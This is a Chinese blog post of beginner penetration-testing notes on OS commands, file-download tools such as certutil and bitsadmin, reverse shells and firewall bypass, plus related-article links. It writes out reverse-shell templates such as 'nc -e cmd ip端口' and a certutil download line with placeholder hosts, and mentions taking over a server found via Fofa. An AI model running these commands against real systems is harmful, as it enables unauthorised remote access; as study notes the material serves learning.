操作系统_名词_文件下载_反弹SHELL_防火墙绕过

最新推荐文章于 2024-10-31 17:28:42 发布
最新推荐文章于 2024-10-31 17:28:42 发布
阅读量716 收藏 1
点赞数 5
分类专栏: 网络渗透 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72827793/article/details/142455851
版权

操作系统

操作系统-用途&命令&权限&用户&防火墙
1、个人计算机&服务器用机
2、windows&Linux常见命令
3、文件权限&服务权限&用户权限
4、系统用户&用户组&服务用户等分类
5、自带防火墙出站&入站规则策略协议

实用案例1:文件上传下载-解决无图形化&解决数据传输
Linux:wget curl python ruby perl java等
Windows: Powershell Certutil Bitsadmin msiexec mshta rundll32等

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯(反弹就是将权限给别人)
useradd passwd
测试Linux系统添加用户或修改命令交互回显

结合案例1:防火墙绕过-正向链接&反向链接&内网服务器
1、内网:
内网->用户
nc -e cmd ip地址 端口

就是把本机的cmd权限给这个ip的窗口

nc -lvvp 监听的端口号

2.防火墙
服务器主机<->另一个服务器主机
如果开了防火墙,是不行的
入站严格出站宽松
nc -e cmd ip地址 端口(就是正向链接)
主动把权限给出去
反向链接就是别人找你

结合案例-Fofa拿下同行Pikachu服务器
文件下载&反弹shell:
certuil -urlcache -split -f ip地址
nc -e cmd ip地址

在这里插入图片描述
找个在线的靶场

在这里插入图片描述

Back~~
关注
专栏目录
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
第1天-操作系统_名词_文件下载_反弹SHELL_防火墙绕过
GYL143632的博客
08-26 189
小迪安全第一天
操作系统名词_文件下载_反弹shell_1
2301_79431343的博客
09-17 1103
比如windows主机和一个linux主机,只有windows主机开了防火墙,那么可以从windows主机交出数据给linux,此时为出站。碰到防火墙,尽量让对方主动找我们,而不是我们去找他。在上传和下载文件时,很多时候我们没有图形化界面,这时就需要使用相应的指令在对应的系统中进行下载。Shellcode:简单翻译'shell代码',是Payload的一种,由于其建立正向/反向shell而得名。Payload:中文'有效载荷',指成功exploit之后,真正在目标系统执行的代码或指今。
1、基础入门-操作系统&名词&文件下载&反弹 SHELL&防火墙绕过
weixin_44163849的博客
04-08 336
Shellcode:简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反向shell而得名。POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。系统添加用户或修改密码命令交互回显问题。黑盒测试:没有代码,只有目标。白盒测试:知道目标的部分信息。
day01 操作系统&文件下载&反弹shell&防火墙绕过
wanjia01的博客
03-03 5771
#知识点: 1、名词解释-渗透测试-漏洞&攻击&后门&代码&专业词 2、必备技能-操作系统-用途&命令&权限&用户&防火墙 3、必备技能-文件下载-缘由&场景&使用-提权&后渗透 4、必备技能-反弹命令-缘由&场景&使用-提权&后渗透 前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒, 反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞
第一天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过
m0_51322401的博客
11-23 647
反弹反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。Payload:中文"有效载荷",指成功exploit之后,真正在目标系统执行的代码或指令(漏洞利用成功后的形式,或者说通道)。
1、基础入门——操作系统&文件下载&反弹SHELL&防火墙绕过
qq_55202378的博客
11-19 433
POC:验证漏洞存在的代码;EXP:利用漏洞的代码;payload:漏洞利用载荷,shellcode:漏洞代码,webshell:特指网站后门;木马:强调控制电脑病毒:破坏性程序;反弹shell:将权限反弹到其他机器上;跳板:中介黑盒测试:没有代码,不知目标情况;白盒测试:知道代码社会工程学:“社工”撞库:从泄露的数据库(社工库)中获取想要的信息;ATT&CK:红蓝对抗框架,
网络安全攻防基础入门笔记--操作系统&名词解释&文件下载&反弹shell&防火墙绕过
谜语人的博客
06-15 1253
全程Proof of Concept,中文"概念验证",常指一段漏洞证明的代码。
基础入门-操作系统&名词&文件下载&反弹shell&防火墙绕过
金灰的博客
04-09 746
免责声明:本文仅做技术交流与学习,有其它违法行为请及时联系.都是基础,会的走吧~~~
【小迪安全】Day01基础入门-专业名词&文件上传下载及案例
2201_75772809的博客
04-21 460
> xiaodi8 防火墙。xiaodi8 防火墙 -> aliyun。内网 -> xiaodi8。——黑客工具:瑞士军刀。
网络安全渗透测试——名词解释
weixin_43778463的博客
10-12 3494
常用术语解释
Empire用法及操作
weixin_65695770的博客
04-07 1205
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测和大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 Empire运行在linux平台上
红队攻防渗透技术实战流程:红队目标信息收集之基础资产信息收集
HACKONE的博客
03-23 1164
在红队渗透测试中,客户的合作至关重要,他们会提供目标资产的基本信息作为初始攻击面。红队的行动范围通常是由客户明确授权界定的,这其中包括但不限于对主域名、下属子公司以及整个供应链体系中的相关资产进行安全测试。红队需严格按照约定的边界执行任务,可能涵盖但不限于对主域名下的各个子域名进行深度侦查,探究子公司间的网络互联情况,以及深入分析供应链各环节的软硬件设施、业务流程和数据交换点,以全方位评估和模拟真实攻击场景下的安全风险。在执行过程中,红队始终保持专业操守,确保所有行动均在合法、合规的前提下进行,并以增强客户
地磁传感器(学习笔记下)
Gaorui678的博客
10-26 474
读到后的值,最终传入t_sQMC5883L定义的结构体,注意一下这里面的mag_reg数据变量,定义的时候是16位的3个元素,在读寄存器的时候,强制为8位指针变量,读6个字节。然后我们再写一个计算方位角的函数,使用磁力值计算方位角,最简单的方式,只需要一个公式。咱们接着学习笔记上来学习哈,首先,我们编写读取方位角程序,配置好传感器以后,我们就可以读取磁力值了,我们先定义一个结构体类型,用来存放磁力值以及方位角值。在主函数中,qmc5883l初始化以后,每间隔1秒钟计算1次方位角值,然后通过串口发送到终端。
Flink CDC系列之:学习理解standalone模式
zhengzaifeidelushang的博客
10-28 615
独立模式是 Flink 最简单的部署模式。本简短指南将向您展示如何下载、安装和运行 Flink 的最新稳定版本。您还将运行一个示例 Flink CDC 作业并在 Web UI 中查看它。
人工智能入门要学习多久?
最新发布
cd_farsight的博客
10-31 130
人工智能是一个快速发展的领域,新的技术和算法不断涌现。这可能需要你定期投入时间,比如每月至少花费几个小时来跟踪最新的研究和发展。如果你是计算机科学或相关专业的学生,或者对计算机科学有较深的兴趣,可能能更快地掌握。实践项目的时间可以因项目的复杂性和范围而异,通常需要几个月的时间来完成。学习人工智能所需的时间可以根据个人的学习速度、目标和深度有所不同。这通常需要几个月的时间,具体取决于个人的数学背景。:Python是进行人工智能学习的主要语言,建议从基础开始学习,这也是一个月左右的时间可以掌握。
【我的 PWN 学习手札】setcontext + ROP
Mr_Fmnwon的博客
10-28 792
setcontext的gadget能够“恢复上下文”,即设置寄存器的值。除了可以利用其执行shellcode,还可以实现ROP来getshell。本篇介绍了利用setcontext+ROP的方法,ORW地打印flag信息。
TypeScript 学习笔记
weixin_57796792的博客
10-29 1097
TypeScript 中文网: https://www.tslang.cn/docs/home.html。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Back~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值